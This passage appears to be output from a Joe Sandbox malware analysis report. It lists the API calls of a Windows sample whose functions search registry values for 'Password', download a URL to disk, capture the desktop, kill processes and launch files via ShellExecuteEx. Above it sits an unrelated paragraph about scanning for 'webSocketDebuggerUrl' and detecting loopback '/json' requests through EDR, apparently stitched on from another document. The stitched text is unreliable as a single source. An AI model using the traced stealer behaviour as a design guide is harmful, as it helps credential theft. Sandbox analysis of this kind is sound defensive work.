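The substring scan stops at the first `"ws://` after the key, so it only ever finds URLs that follow a `webSocketDebuggerUrl` field; a `ws://` string in the `url` field of an earlier target is skipped. On a live host the same check belongs in the network or EDR layer: loopback HTTP to a `/json` path from anything other than a browser or development tool.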
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 006416A1
                          • lstrcpy.KERNEL32(00000000,0128AFF0), ref: 006416CC
                          • lstrlen.KERNEL32(?), ref: 006416D9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006416F6
                          • lstrcat.KERNEL32(00000000,?), ref: 00641704
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0064172A
                          • lstrlen.KERNEL32(01299B08), ref: 0064173F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00641762
                          • lstrcat.KERNEL32(00000000,01299B08), ref: 0064176A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641792
                          • ShellExecuteEx.SHELL32(?), ref: 006417CD
                          • ExitProcess.KERNEL32 ref: 00641803
                           Memory Dump Source
                           • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: the same sixteen memory regions listed for the first function above
                           Joe Sandbox IDA Plugin
                           • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                          • String ID: <
                          • API String ID: 3579039295-4251816714
                          • Opcode ID: b11fdf4fab290e04a907983371fdb6b3ef98758d09caa5d7ddeb8635ee205ef8
                          • Instruction ID: b7a2ac24e66dce57dc89d9790bee6f7f69b1572508e51f7c3df39acd40d75134
                          • Opcode Fuzzy Hash: b11fdf4fab290e04a907983371fdb6b3ef98758d09caa5d7ddeb8635ee205ef8
                          • Instruction Fuzzy Hash: 45516D7090162AEBDB11DFA5DC94ADEBBFABF48301F044129E505E7351DB34AE418B94
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063EFE4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063F012
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0063F026
                          • lstrlen.KERNEL32(00000000), ref: 0063F035
                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 0063F053
                          • StrStrA.SHLWAPI(00000000,?), ref: 0063F081
                          • lstrlen.KERNEL32(?), ref: 0063F094
                          • lstrlen.KERNEL32(00000000), ref: 0063F0B2
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0063F0FF
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0063F13F
                           Memory Dump Source
                           • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: the same sixteen memory regions listed for the first function above
                           Joe Sandbox IDA Plugin
                           • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Similarity
                          • API ID: lstrcpy$lstrlen$AllocLocal
                          • String ID: ERROR
                          • API String ID: 1803462166-2861137601
                          • Opcode ID: 4a04b53c99ba3c43a8382cf5eda58ce68eec06f667790198a4d173af60ad74d5
                          • Instruction ID: 976f9a18b6622a320e1cec13bf9476c4a70fc5ecd6becb8cd7432099947e1110
                          • Opcode Fuzzy Hash: 4a04b53c99ba3c43a8382cf5eda58ce68eec06f667790198a4d173af60ad74d5
                          • Instruction Fuzzy Hash: E951B031D10616AFCB61AF39EC5AAAE77A6AF54305F04416CF84A9B716DF34DC018BD0
                          APIs
                          • GetEnvironmentVariableA.KERNEL32(01298860,00859BD8,0000FFFF), ref: 0062A026
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062A053
                          • lstrlen.KERNEL32(00859BD8), ref: 0062A060
                          • lstrcpy.KERNEL32(00000000,00859BD8), ref: 0062A08A
                          • lstrlen.KERNEL32(00654C4C), ref: 0062A095
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062A0B2
                          • lstrcat.KERNEL32(00000000,00654C4C), ref: 0062A0BE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062A0E4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062A0EF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062A114
                          • SetEnvironmentVariableA.KERNEL32(01298860,00000000), ref: 0062A12F
                          • LoadLibraryA.KERNEL32(0129D3A8), ref: 0062A143
                           Memory Dump Source
                           • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: the same sixteen memory regions listed for the first function above
                           Joe Sandbox IDA Plugin
                           • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Similarity
                          • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                          • String ID:
                          • API String ID: 2929475105-0
                          • Opcode ID: 0070bc9151290c57105d95321fa7666fcb77de85239a8824d34ecf4542e00b1a
                          • Instruction ID: 952fbc866c978538f5f7ef7c05c8d833a5bb1d3c0759834a744a9160573d76a0
                          • Opcode Fuzzy Hash: 0070bc9151290c57105d95321fa7666fcb77de85239a8824d34ecf4542e00b1a
                          • Instruction Fuzzy Hash: 40919B30A01F21DFD7219BE4EC49AA637A7BB54716F444119E805977A2EFB9CD808F82
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063C8A2
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063C8D1
                          • lstrlen.KERNEL32(00000000), ref: 0063C8FC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063C932
                          • StrCmpCA.SHLWAPI(00000000,00654C3C), ref: 0063C943
                           Memory Dump Source
                           • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: the same sixteen memory regions listed for the first function above
                           Joe Sandbox IDA Plugin
                           • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: e0001e29a51b753a914ec6469e992ca1affe4db147a33d521782b15af7d247e3
                          • Instruction ID: af1db976ebf71bc53cb54f4eac4142589337b0ec12b78d34527c7e7829f67424
                          • Opcode Fuzzy Hash: e0001e29a51b753a914ec6469e992ca1affe4db147a33d521782b15af7d247e3
                          • Instruction Fuzzy Hash: BE61C071D1172AABCB10EFB59845AEE7BBABF09311F040569F841F7341DB3889058BD0
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00640CF0), ref: 00644276
                          • GetDesktopWindow.USER32 ref: 00644280
                          • GetWindowRect.USER32(00000000,?), ref: 0064428D
                          • SelectObject.GDI32(00000000,00000000), ref: 006442BF
                          • GetHGlobalFromStream.COMBASE(00640CF0,?), ref: 00644336
                          • GlobalLock.KERNEL32(?), ref: 00644340
                          • GlobalSize.KERNEL32(?), ref: 0064434D
                           Memory Dump Source
                           • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: the same sixteen memory regions listed for the first function above
                           Joe Sandbox IDA Plugin
                           • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Similarity
                          • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                          • String ID:
                          • API String ID: 1264946473-0
                          • Opcode ID: 997f620de6b1fe3e61177d6ecac4fa7179ded942ba06dbcc51468c1334e6f803
                          • Instruction ID: b35b37fb9cf585e1f298033949a7b410ad37585606e53dbbc4448c7c5263cfdd
                          • Opcode Fuzzy Hash: 997f620de6b1fe3e61177d6ecac4fa7179ded942ba06dbcc51468c1334e6f803
                          • Instruction Fuzzy Hash: 7B511EB5910219EFDB10DFA4EC86AEEB7B9FF48711F104519F905A3250DB78AD058BA0
                          APIs
                          • lstrcat.KERNEL32(?,0129DA98), ref: 0063E00D
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0063E037
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063E06F
                          • lstrcat.KERNEL32(?,00000000), ref: 0063E07D
                          • lstrcat.KERNEL32(?,?), ref: 0063E098
                          • lstrcat.KERNEL32(?,?), ref: 0063E0AC
                          • lstrcat.KERNEL32(?,0128AF00), ref: 0063E0C0
                          • lstrcat.KERNEL32(?,?), ref: 0063E0D4
                          • lstrcat.KERNEL32(?,0129D1C8), ref: 0063E0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063E11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0063E126
                           Memory Dump Source
                           • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: the same sixteen memory regions listed for the first function above
                           Joe Sandbox IDA Plugin
                           • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 4230089145-0
                          • Opcode ID: e3e4b07efc22f1529acdd926ad0d78c269360f00cd33fb9e35a95c74e02d8fcf
                          • Instruction ID: 326b347eb8a927ebed8066e96fe7f8d1007d2d2d20d4a83a5692189b86ff8f24
                          • Opcode Fuzzy Hash: e3e4b07efc22f1529acdd926ad0d78c269360f00cd33fb9e35a95c74e02d8fcf
                          • Instruction Fuzzy Hash: F861BE7191022CEBCB65DB64DC45ADDB7BABF48300F1049A9F649A3290DB74AF858F90
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00626AFF
                          • InternetOpenA.WININET(0064CFEC,00000001,00000000,00000000,00000000), ref: 00626B2C
                          • StrCmpCA.SHLWAPI(?,0129E4C8), ref: 00626B4A
                          • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00626B6A
                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00626B88
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00626BA1
                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00626BC6
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00626BF0
                          • CloseHandle.KERNEL32(00000000), ref: 00626C10
                          • InternetCloseHandle.WININET(00000000), ref: 00626C17
                          • InternetCloseHandle.WININET(?), ref: 00626C21
                           Memory Dump Source
                           • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: the same sixteen memory regions listed for the first function above
                           Joe Sandbox IDA Plugin
                           • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Similarity
                          • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                          • String ID:
                          • API String ID: 2500263513-0
                          • Opcode ID: c35ef28874a2e9535201b9091b2a83630c290bb3a2099f945feb37b277a72bde
                          • Instruction ID: bb88a03e49a22e151d28186d6544e6720f3ff9b4e4ecff20625ff9aa5c0960a7
                          • Opcode Fuzzy Hash: c35ef28874a2e9535201b9091b2a83630c290bb3a2099f945feb37b277a72bde
                          • Instruction Fuzzy Hash: C2415E71A00615EBDB20DB64EC85FAE77A9BB08702F004555FA05E7290EF74AD448BA4
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00634F39), ref: 00644545
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0064454C
                          • wsprintfW.USER32 ref: 0064455B
                          • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 006445CA
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 006445D9
                          • CloseHandle.KERNEL32(00000000,?,?), ref: 006445E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                          • String ID: 9Oc$%hs$9Oc
                          • API String ID: 885711575-3578155578
                          • Opcode ID: d04b892ffe80f1185e708cfe22e8ae63624f0737693fa8b561341838d599a593
                          • Instruction ID: 2ce8bcd28c73e7a13e042cbc875088da4414e7ab7324917adf708e1f077d29c7
                          • Opcode Fuzzy Hash: d04b892ffe80f1185e708cfe22e8ae63624f0737693fa8b561341838d599a593
                          • Instruction Fuzzy Hash: 28314D72A00205BBDB10DBA4DC4ABDEB77ABF48701F104459FA05E7180EF74AA458BA5
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062BC1F
                          • lstrlen.KERNEL32(00000000), ref: 0062BC52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062BC7C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062BC84
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062BCAC
                          • lstrlen.KERNEL32(00654AD4), ref: 0062BD23
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: 264d99d108a9e68e912438862e2dca9371698aad071267a40709b2fbc950b8e6
                          • Instruction ID: 31e19476a19a2f191aa7091c85adf1b4472671794ae8960edebb87e6624e9774
                          • Opcode Fuzzy Hash: 264d99d108a9e68e912438862e2dca9371698aad071267a40709b2fbc950b8e6
                          • Instruction Fuzzy Hash: 6AA18B70A00A26DBCB60DF25E94AAEEB7B2FF44305F189469E4099B761DB39DC41CF44
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00645F2A
                          • std::_Xinvalid_argument.LIBCPMT ref: 00645F49
                          • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00646014
                          • memmove.MSVCRT(00000000,00000000,?), ref: 0064609F
                          • std::_Xinvalid_argument.LIBCPMT ref: 006460D0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$memmove
                          • String ID: invalid string position$string too long
                          • API String ID: 1975243496-4289949731
                          • Opcode ID: 8e2e9df827bc492d8346f696bf5c491b207a1927a3cc7a8f148032e3983ae6b4
                          • Instruction ID: ed3fa95aa0e793a4c0e4caa142c50a35dbc0d670bb20226ad759889accdb556d
                          • Opcode Fuzzy Hash: 8e2e9df827bc492d8346f696bf5c491b207a1927a3cc7a8f148032e3983ae6b4
                          • Instruction Fuzzy Hash: 70619D70700604DBDB28CF5CC99096EB7B7EF85704B244A59F4928B782C731ED85CB96
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063E06F
                          • lstrcat.KERNEL32(?,00000000), ref: 0063E07D
                          • lstrcat.KERNEL32(?,?), ref: 0063E098
                          • lstrcat.KERNEL32(?,?), ref: 0063E0AC
                          • lstrcat.KERNEL32(?,0128AF00), ref: 0063E0C0
                          • lstrcat.KERNEL32(?,?), ref: 0063E0D4
                          • lstrcat.KERNEL32(?,0129D1C8), ref: 0063E0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063E11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0063E126
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFile
                          • String ID:
                          • API String ID: 3428472996-0
                          • Opcode ID: 55b163355bdc71bcc7a8251c57849b502cd749eccc91b4926c8d63317fb4a333
                          • Instruction ID: 73a8543b7fbb3ec925d523f7f5ccb0086db67d4c0422967e867d86a3398d2353
                          • Opcode Fuzzy Hash: 55b163355bdc71bcc7a8251c57849b502cd749eccc91b4926c8d63317fb4a333
                          • Instruction Fuzzy Hash: 7C41C571D1052CEBCB65EB64EC45ADD73B6BF48310F004AA9F54A93294DB349F858F90
                          APIs
                            • Part of subcall function 006277D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00627805
                            • Part of subcall function 006277D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0062784A
                            • Part of subcall function 006277D0: StrStrA.SHLWAPI(?,Password), ref: 006278B8
                            • Part of subcall function 006277D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 006278EC
                            • Part of subcall function 006277D0: HeapFree.KERNEL32(00000000), ref: 006278F3
                          • lstrcat.KERNEL32(00000000,00654AD4), ref: 00627A90
                          • lstrcat.KERNEL32(00000000,?), ref: 00627ABD
                          • lstrcat.KERNEL32(00000000, : ), ref: 00627ACF
                          • lstrcat.KERNEL32(00000000,?), ref: 00627AF0
                          • wsprintfA.USER32 ref: 00627B10
                          • lstrcpy.KERNEL32(00000000,?), ref: 00627B39
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00627B47
                          • lstrcat.KERNEL32(00000000,00654AD4), ref: 00627B60
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                          • String ID: :
                          • API String ID: 398153587-3653984579
                          • Opcode ID: fe548e41a4cfa0b620025cb077817083f0694d2d33904782b47e56f9c4c7995e
                          • Instruction ID: f2a8364d1240f3949e8a660abedeecf98c4d3b334ada86a9a274b0f5508fd20f
                          • Opcode Fuzzy Hash: fe548e41a4cfa0b620025cb077817083f0694d2d33904782b47e56f9c4c7995e
                          • Instruction Fuzzy Hash: 3E31C272A00A24EFCB10DF68EC45DAAB77BFB84312F140519E946A3340DB34A945CF60
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 0063820C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00638243
                          • lstrlen.KERNEL32(00000000), ref: 00638260
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00638297
                          • lstrlen.KERNEL32(00000000), ref: 006382B4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006382EB
                          • lstrlen.KERNEL32(00000000), ref: 00638308
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00638337
                          • lstrlen.KERNEL32(00000000), ref: 00638351
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00638380
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: f8b91ac135a662ba2a4e17adc7946c191c5707593510db9a38e594a01549925e
                          • Instruction ID: 344e938731e7c080bda591cbfa75e50759f02c0b35cb35084e5b9edde35f1103
                          • Opcode Fuzzy Hash: f8b91ac135a662ba2a4e17adc7946c191c5707593510db9a38e594a01549925e
                          • Instruction Fuzzy Hash: 67515971900B12AFEB149FA9D858AEAB7AAFF44700F154514BD06EB344EF34E950CBE0
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00627805
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0062784A
                          • StrStrA.SHLWAPI(?,Password), ref: 006278B8
                            • Part of subcall function 00627750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0062775E
